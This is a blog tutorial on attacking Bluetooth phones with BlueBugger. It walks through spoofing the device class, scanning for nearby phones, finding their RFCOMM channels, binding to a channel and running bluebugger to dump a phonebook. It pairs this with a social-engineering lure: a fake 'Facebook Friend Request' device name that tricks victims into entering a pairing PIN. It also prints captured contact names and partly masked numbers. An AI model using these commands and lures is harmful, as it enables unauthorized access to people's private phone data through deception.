Header Ads


BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information.
This tutorial will show you the usage of bluebugger but i have noticed over time there is lack of information on the interweb about bluetooth hacking i havent managed to successfully exploit a phone without fooling the client into inserting a set key.
How did i do this?
Exploiting client’s using a key is hard but it is effective if the client isnt sure what they are doing with there phones for example i can name my bluetooth device that will be connecting to the clients phone as “Facebook Friend Request Enter 1234 To Add Friend” I found it quiet amusing that people would enter the key once they have entered the key we have a remote connection allowing the attacker to make phone calls gather info about the phone copy the phonebook read there messages & more
Enough of the talk lets begin with the tutorial, The first stage of the tutorial is to put the bluetooth device that is either connected or built into your computer up so it is ready for scanning here is how it can be done

root@bt:~# hciconfig hci0 uproot@bt:~#
Now the device is up & running the devices class needs to be changed so it shows as a Cell/Mobile phone this is prettey simple you will be using the same tool hciconfig
root@bt:~# hciconfig hci0 class 0x050204root@bt:~#
Now the class is set if you would like you can check the class is set by using the following command

root@bt:~# hciconfig -a
hci0:   Type: USB        BD Address: 00:15:83:C6:67:90 ACL MTU: 384:8 SCO MTU: 64:8        UP RUNNING        RX bytes:354 acl:0 sco:0 events:12 errors:0        TX bytes:44 acl:0 sco:0 commands:12 errors:0        Features: 0xff 0xff 0x8f 0xfe 0x9b 0xf9 0x00 0x80        Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3        Link policy:        Link mode: SLAVE ACCEPT        Name: 'BT2.0'        Class: 0x050204        Service Classes: Positioning, Rendering        Device Class: Phone, Cellular        HCI Ver: 2.0 (0x3) HCI Rev: 0x7a6 LMP Ver: 2.0 (0x3) LMP Subver: 0x7a6        Manufacturer: Cambridge Silicon Radio (10)root@bt:~#
Now the device is set up & ready for exploitation & scanning, You can scan for devices
root@bt:~# hcitool scanScanning ...        20:D6:07:A9:B6:F9       Animals phone        00:24:03:7E:CB:80       Nokia 6500c        40:2B:A1:0A:6A:88       C903root@bt:~#
As you can see from the scan there are multiple phones in my house hold, Why is this information useful as you can see
all these are phone's sony erricson C903,Nokia 6500c & Animals phone also it gives the broadcasting address but we need a little more info than this like channel numbers etc, You can find that info by using this command.
root@bt:~# sdptool browse 40:2B:A1:0A:6A:88  <-----Broadcasting address's will differ
Browsing 40:2B:A1:0A:6A:88 ...Service Description: Sony Ericsson C903Service RecHandle: 0x10000Service Class ID List:  "PnP Information" (0x1200)Service Name: OBEX SyncML ClientService RecHandle: 0x2008002Service Class ID List:  UUID 128: 00000002-0000-1000-8000-0002ee000002Protocol Descriptor List:  "L2CAP" (0x0100)  "RFCOMM" (0x0003)    Channel: 10  "OBEX" (0x0008)Service Name: Serial Port 1Service RecHandle: 0x2008003Service Class ID List:  "Serial Port" (0x1101)Protocol Descriptor List:  "L2CAP" (0x0100)  "RFCOMM" (0x0003)    Channel: 2Service Name: Dial-up NetworkingService RecHandle: 0x2008004Service Class ID List:  "Dialup Networking" (0x1103)  "Generic Networking" (0x1201)Protocol Descriptor List:  "L2CAP" (0x0100)  "RFCOMM" (0x0003)    Channel: 1Profile Descriptor List:  "Dialup Networking" (0x1103)    Version: 0x0101[SNIP]
So now there is enough information gathered, All is left to do now is to bind to the remote device this can be done using rfcomm here are the following commands for doing so
root@bt:~#rfcomm bind rfcomm0 40:2B:A1:0A:6A:88
Usage of rfcomm
root@bt:~# rfcomm -hRFCOMM configuration utility ver 4.12Usage:        rfcomm [options]  Options:        -i [hciX|bdaddr]      Local HCI device or BD Address        -h, --help            Display help        -r, --raw             Switch TTY into raw mode        -A, --auth            Enable authentication        -E, --encrypt         Enable encryption        -S, --secure          Secure connection        -M, --master          Become the master of a piconet        -f, --config [file]   Specify alternate config file        -a                    Show all devices (default)Commands:        bind       [channel]       Bind device        release                            Release device        show                               Show device        connect    [channel]       Connect device        listen    [channel [cmd]]          Listen        watch     [channel [cmd]]          Watchroot@bt:~#
Now it is time to launch an attack on the client with blue bugger but like i was saying at the beginning of the guide there is problems with the key the only way i have solved this so far is to fool the client into entering a key in backtrack 4 there is no way of setting a default key so i have done a bit of googling & came up with using a tool called simple-agent that comes with bluez tool set you can download it here
I have placed this file in:
directory, Then i launch simple-agent
root@bt:~# /etc/init.d/bluetooth startStarting bluetooth: bluetoothd.root@bt:~# /etc/bluetooth/simple-agentAgent registered
Simple Agent is now listening for the bluetooth device to ask for the pin for pairing the devices
Then i can now lauch blue bugger with the following:
root@bt:~# bluebugger -m "Facebook Friend Request Enter 1234 To Accept" -c 2 -a 40:2B:A1:0A:6A:88  phonebook
-m Name To Send To Client
-c Channel To Connect To Clients Phone
-a Broadcast Address
phonebook To Read The Clients Phonebook
root@bt:~# /etc/bluetooth/simple-agentAgent registeredRequestPinCode (/org/bluez/hci0/dev_40_2B_A1_0A_6A_88)Enter PIN Code: 1234
My Blue Bugger Output
Name:   Chipmunk/M","2010/12/15,13:19Number: 07XXXXX8559Name:   Martyn/M","2010/12/09,14:01Number: 07XXXXX4856Name:   ","2010/11/17,09:22Number: 07XXXXX5057Name:   Leana/M","2010/09/30,22:58Number: 07XXXXX4943[SNIP]
As you can see by fooling the client into entering the pass key you can gain access to the phone

as well as for personal tutorial follow me and ask your personal dought's
Powered by Blogger.